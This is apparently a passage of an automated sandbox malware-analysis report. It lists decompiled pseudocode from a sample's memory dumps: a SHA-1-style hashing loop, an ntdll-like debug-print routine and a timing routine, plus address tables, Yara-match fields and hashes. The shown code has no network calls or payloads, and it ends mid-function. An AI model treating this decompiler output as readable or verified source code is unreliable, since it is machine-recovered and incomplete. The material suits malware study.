					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                                          0x00409e3b
                                          0x00409e3f
                                          0x00409e41
                                          0x00409e41
                                          0x00409e44
                                          0x00409e66
                                          0x00409e8c
                                          0x00409eb2
                                          0x00409ed4
                                          0x00409edb
                                          0x00409ede
                                          0x00409ee1
                                          0x00409eea
                                          0x00409ef0
                                          0x00409ef7
                                          0x00409f08
                                          0x00409f0b
                                          0x00409f0e
                                          0x00409f12
                                          0x00409f14
                                          0x00409f16
                                          0x00409f1f
                                          0x00409f22
                                          0x00409f25
                                          0x00409f30
                                          0x00409f36
                                          0x00409f38
                                          0x00409f38
                                          0x00409f3b
                                          0x00409f3e
                                          0x00409f3e
                                          0x00409f43
                                          0x00409f45
                                          0x00409f48
                                          0x00409f4b
                                          0x00409f51
                                          0x00409f54
                                          0x00409f57
                                          0x00409f60
                                          0x00409f66
                                          0x00409f6f
                                          0x00409f7e
                                          0x00409f85
                                          0x00409f88
                                          0x00409f8b
                                          0x00409f94
                                          0x00409f97
                                          0x00409f9a
                                          0x00409fb2
                                          0x00409fb9
                                          0x00409fbb
                                          0x00409fbe
                                          0x00409fc1
                                          0x00409fca
                                          0x00409fd1
                                          0x00409fd4
                                          0x00409fd7
                                          0x00409fe6
                                          0x00409fed
                                          0x00409ff0
                                          0x00409ff3
                                          0x00409ffc
                                          0x0040a006
                                          0x0040a009
                                          0x0040a015
                                          0x0040a018
                                          0x0040a01f
                                          0x0040a022
                                          0x0040a025
                                          0x0040a02a
                                          0x0040a02d
                                          0x0040a036
                                          0x0040a047
                                          0x0040a04a
                                          0x0040a04d
                                          0x0040a054
                                          0x0040a057
                                          0x0040a05a
                                          0x0040a05d
                                          0x0040a05f
                                          0x0040a062
                                          0x0040a065
                                          0x0040a06e
                                          0x0040a073
                                          0x0040a073
                                          0x0040a088
                                          0x0040a08b
                                          0x0040a08e
                                          0x0040a095
                                          0x0040a098
                                          0x0040a09b
                                          0x0040a0b0
                                          0x0040a0b7
                                          0x0040a0ba
                                          0x0040a0be
                                          0x0040a0c1
                                          0x0040a0c6
                                          0x0040a0c9
                                          0x0040a0d8
                                          0x0040a0db
                                          0x0040a0e2
                                          0x0040a0e5
                                          0x0040a0e8
                                          0x0040a0eb
                                          0x0040a0ee
                                          0x0040a0f6
                                          0x0040a104
                                          0x0040a107
                                          0x0040a10a
                                          0x0040a10a
                                          0x0040a111
                                          0x0040a114
                                          0x0040a117
                                          0x0040a11f
                                          0x0040a12d
                                          0x0040a130
                                          0x0040a137
                                          0x0040a13a
                                          0x0040a13d
                                          0x0040a140
                                          0x0040a143
                                          0x0040a14c
                                          0x0040a153
                                          0x0040a153
                                          0x0040a159
                                          0x0040a172
                                          0x0040a175
                                          0x0040a17c
                                          0x0040a17f
                                          0x0040a182
                                          0x0040a194
                                          0x0040a19e
                                          0x0040a1a1
                                          0x0040a1aa
                                          0x0040a1ad
                                          0x0040a1b4
                                          0x0040a1b7
                                          0x0040a1bd
                                          0x0040a1d0
                                          0x0040a1d7
                                          0x0040a1da
                                          0x0040a1dd
                                          0x0040a1e0
                                          0x0040a1e9
                                          0x0040a1ec
                                          0x0040a1ff
                                          0x0040a202
                                          0x0040a20c
                                          0x0040a20f
                                          0x0040a211
                                          0x0040a21a
                                          0x0040a21d
                                          0x0040a230
                                          0x0040a236
                                          0x0040a239
                                          0x0040a240
                                          0x0040a242
                                          0x0040a245
                                          0x0040a248
                                          0x0040a24b
                                          0x0040a24e
                                          0x0040a251
                                          0x0040a25a
                                          0x0040a25f
                                          0x0040a262
                                          0x0040a262
                                          0x0040a275
                                          0x0040a278
                                          0x0040a27b
                                          0x0040a282
                                          0x0040a285
                                          0x0040a288
                                          0x0040a28b
                                          0x0040a29e
                                          0x0040a2a1
                                          0x0040a2ac
                                          0x0040a2af
                                          0x0040a2bb
                                          0x0040a2be
                                          0x0040a2c4
                                          0x0040a2c7
                                          0x0040a2ca
                                          0x0040a2d1
                                          0x0040a2e1
                                          0x0040a2e4
                                          0x0040a2ea
                                          0x0040a2ed
                                          0x0040a2f4
                                          0x0040a2f6
                                          0x0040a2f9
                                          0x0040a2fc
                                          0x0040a2ff
                                          0x0040a302
                                          0x0040a309
                                          0x0040a318
                                          0x0040a31b
                                          0x0040a322
                                          0x0040a325
                                          0x0040a328
                                          0x0040a32b
                                          0x0040a32e
                                          0x0040a331
                                          0x0040a334
                                          0x0040a33d
                                          0x0040a34e
                                          0x0040a356
                                          0x0040a35c
                                          0x0040a35f
                                          0x0040a361
                                          0x0040a364
                                          0x0040a367
                                          0x0040a374

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: (
                                          • API String ID: 0-3887548279
                                          • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                          • Instruction ID: eeb0385743567321b296ee52300d967ee07cf61effa89e1da4901bd412379478
                                          • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                          • Instruction Fuzzy Hash: 11021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033AB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E033AB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x347f7a8);
				E033FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E033FD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E033ED000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E033EF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L033FDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E033EB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E033EB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E033EE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E033EA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                          0x033ab171
                                          0x033ab171
                                          0x033ab171
                                          0x033ab171
                                          0x033ab171
                                          0x033ab176
                                          0x033ab17b
                                          0x033ab180
                                          0x033ab186
                                          0x033ab18f
                                          0x033ab198
                                          0x033ab1a4
                                          0x033ab1aa
                                          0x03404802
                                          0x03404802
                                          0x03404805
                                          0x0340480c
                                          0x0340480e
                                          0x033ab1d1
                                          0x033ab1d3
                                          0x033ab1de
                                          0x033ab1de
                                          0x03404817
                                          0x0340481e
                                          0x03404820
                                          0x03404822
                                          0x03404822
                                          0x03404824
                                          0x03404824
                                          0x0340482a
                                          0x00000000
                                          0x00000000
                                          0x03404835
                                          0x0340483a
                                          0x0340483d
                                          0x0340483f
                                          0x03404842
                                          0x03404842
                                          0x03404842
                                          0x03404846
                                          0x0340484c
                                          0x0340484e
                                          0x03404851
                                          0x03404851
                                          0x03404853
                                          0x03404854
                                          0x03404854
                                          0x03404858
                                          0x0340485a
                                          0x0340485a
                                          0x0340485d
                                          0x0340485f
                                          0x03404861
                                          0x03404861
                                          0x03404866
                                          0x0340486b
                                          0x0340486e
                                          0x03404871
                                          0x03404876
                                          0x03404876
                                          0x03404878
                                          0x0340487b
                                          0x03404884
                                          0x03404884
                                          0x00000000
                                          0x0340487d
                                          0x0340487d
                                          0x03404882
                                          0x03404889
                                          0x03404889
                                          0x0340488f
                                          0x03404891
                                          0x034048e0
                                          0x034048e2
                                          0x034048e4
                                          0x034048e4
                                          0x034048e7
                                          0x034048e7
                                          0x034048ed
                                          0x034048f4
                                          0x034048f6
                                          0x03404951
                                          0x03404951
                                          0x03404953
                                          0x03404953
                                          0x03404956
                                          0x03404956
                                          0x03404958
                                          0x03404959
                                          0x03404959
                                          0x0340495d
                                          0x0340495d
                                          0x0340495f
                                          0x0340495f
                                          0x03404965
                                          0x03404969
                                          0x034049ba
                                          0x034049ba
                                          0x034049c1
                                          0x034049c5
                                          0x034049cc
                                          0x034049d4
                                          0x034049d7
                                          0x034049da
                                          0x034049e4
                                          0x034049e5
                                          0x034049f3
                                          0x03404a02
                                          0x00000000
                                          0x03404a02
                                          0x03404972
                                          0x03404974
                                          0x00000000
                                          0x00000000
                                          0x03404976
                                          0x03404979
                                          0x03404982
                                          0x03404983
                                          0x03404984
                                          0x0340498b
                                          0x0340498d
                                          0x03404991
                                          0x03404993
                                          0x03404999
                                          0x0340499d
                                          0x034049a2
                                          0x034049a2
                                          0x034049a2
                                          0x03404999
                                          0x034049ac
                                          0x00000000
                                          0x034049b3
                                          0x034048f8
                                          0x034048fe
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x034048fe
                                          0x03404895
                                          0x0340489c
                                          0x034048ad
                                          0x034048b2
                                          0x034048b5
                                          0x034048b7
                                          0x034048ba
                                          0x034048bc
                                          0x034048c6
                                          0x034048c6
                                          0x034048cb
                                          0x034048d1
                                          0x034048d4
                                          0x034048d8
                                          0x034048d8
                                          0x00000000
                                          0x034048d8
                                          0x034048be
                                          0x034048c0
                                          0x00000000
                                          0x00000000
                                          0x034048c2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x034048c4
                                          0x00000000
                                          0x03404882
                                          0x0340487b
                                          0x03404904
                                          0x03404906
                                          0x00000000
                                          0x00000000
                                          0x03404908
                                          0x0340490e
                                          0x00000000
                                          0x00000000
                                          0x03404910
                                          0x03404917
                                          0x03404917
                                          0x00000000
                                          0x03404917
                                          0x033ab1ba
                                          0x034047f9
                                          0x034047fc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x034047fc
                                          0x033ab1c0
                                          0x033ab1c0
                                          0x033ab1c3
                                          0x033ab1cb
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: _vswprintf_s
                                          • String ID:
                                          • API String ID: 677850445-0
                                          • Opcode ID: 032dee13437a4bf562da0e8e55b4b5ef6199ab7f0ceb82454c7a4bc3d964b8f1
                                          • Instruction ID: 4684bf3d32d2a24df11cd78c1b209045916f4b6065509a00b3ac8fdd7d597f3b
                                          • Opcode Fuzzy Hash: 032dee13437a4bf562da0e8e55b4b5ef6199ab7f0ceb82454c7a4bc3d964b8f1
                                          • Instruction Fuzzy Hash: 5C51E17AE042598EDB30DF798884BAEBBB4AF00310F1441BAD999AF3C1D77449418F94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033CB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E033CB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x349d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E033C7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E03478CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E033E9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E033EB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E033ECE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E033C7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E03478F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E033EAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x3498628; // 0x0
								_v68 = _t77;
								_t78 =  *0x349862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x3498628; // 0x0
							_t116 =  *0x349862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                          0x033cb94c
                                          0x033cb956
                                          0x033cb95c
                                          0x033cb95e
                                          0x033cb964
                                          0x033cb969
                                          0x033cb96d
                                          0x033cb96d
                                          0x033cb970
                                          0x033cb974
                                          0x033cb97a
                                          0x033cbadf
                                          0x033cbadf
                                          0x033cbae2
                                          0x033cbae4
                                          0x033cbae6
                                          0x033cbaf0
                                          0x03412cb8
                                          0x033cbaf6
                                          0x033cbaf6
                                          0x033cbaf6
                                          0x033cbafd
                                          0x033cbb1f
                                          0x033cbb1f
                                          0x033cbaff
                                          0x033cbb00
                                          0x033cbb00
                                          0x033cbb03
                                          0x033cbb03
                                          0x033cbacb
                                          0x033cbacf
                                          0x033cbad0
                                          0x033cbad1
                                          0x033cbadc
                                          0x033cbadc
                                          0x033cb980
                                          0x033cb980
                                          0x033cb988
                                          0x033cb98b
                                          0x033cb98d
                                          0x033cb990
                                          0x033cb993
                                          0x033cb999
                                          0x033cb99b
                                          0x033cb9a1
                                          0x033cb9a5
                                          0x033cb9aa
                                          0x033cb9b0
                                          0x033cb9bb
                                          0x033cb9c0
                                          0x033cb9c3
                                          0x033cb9ca
                                          0x033cb9cc
                                          0x033cb9cf
                                          0x033cb9d3
                                          0x033cb9d7
                                          0x033cba94
                                          0x033cba94
                                          0x033cba98
                                          0x033cbaa3
                                          0x03412ccb
                                          0x033cbaa9
                                          0x033cbaa9
                                          0x033cbaa9
                                          0x033cbab1
                                          0x03412cd5
                                          0x03412cdd
                                          0x03412cdd
                                          0x033cbabb
                                          0x033cbabc
                                          0x033cbac2
                                          0x033cbac3
                                          0x033cbac3
                                          0x033cbac6
                                          0x00000000
                                          0x033cb9dd
                                          0x033cb9dd
                                          0x033cb9e7
                                          0x033cb9e7
                                          0x033cb9ec
                                          0x033cb9ec
                                          0x033cb9f1
                                          0x033cb9f5
                                          0x033cb9fa
                                          0x033cba00
                                          0x033cba0c
                                          0x033cba10
                                          0x033cba10
                                          0x033cba12
                                          0x033cba18
                                          0x00000000
                                          0x00000000
                                          0x033cbb26
                                          0x033cbb26
                                          0x033cba1e
                                          0x033cba1e
                                          0x033cba23
                                          0x033cba25
                                          0x033cba2c
                                          0x033cba30
                                          0x033cba35
                                          0x033cba35
                                          0x033cba41
                                          0x033cba46
                                          0x033cba4c
                                          0x033cba50
                                          0x033cba54
                                          0x033cba6a
                                          0x033cba6e
                                          0x033cba70
                                          0x033cba74
                                          0x033cba78
                                          0x033cba7a
                                          0x033cba7c
                                          0x033cba8e
                                          0x033cba90
                                          0x033cba92
                                          0x033cbb14
                                          0x033cbb14
                                          0x033cbb16
                                          0x033cbb16
                                          0x00000000
                                          0x033cba7c
                                          0x033cbb0a
                                          0x033cbb0d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033cbb0f

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033CB9A5
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 885266447-0
                                          • Opcode ID: 326be160eacaeab8c341042c70243b170b45aadcdea29ecd4a4dc5fd51dbe179
                                          • Instruction ID: 06bcb69517a514b9dc89ac6b9ca77aa8727cb9ad820a9fc6dded15aa63b75f41
                                          • Opcode Fuzzy Hash: 326be160eacaeab8c341042c70243b170b45aadcdea29ecd4a4dc5fd51dbe179
                                          • Instruction Fuzzy Hash: 49514775A18381CFC720DF29C4C192AFBE9BB88600F14496EE9869B354D771EC44CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E033D2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200889, char _a1546912569) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t231;
				signed int _t235;
				void* _t236;
				void* _t237;
				signed int _t240;
				signed int _t242;
				intOrPtr _t244;
				signed int _t247;
				signed int _t254;
				signed int _t257;
				signed int _t265;
				signed int _t271;
				signed int _t273;
				void* _t278;
				signed int _t279;
				unsigned int _t282;
				signed int _t286;
				signed int _t294;
				signed int _t298;
				intOrPtr _t311;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t327;
				signed int _t328;
				void* _t331;
				signed int _t332;
				signed int _t334;
				signed int _t336;
				void* _t337;
				void* _t339;

				_t334 = _t336;
				_t337 = _t336 - 0x4c;
				_v8 =  *0x349d360 ^ _t334;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t327 = 0x349b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t282 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
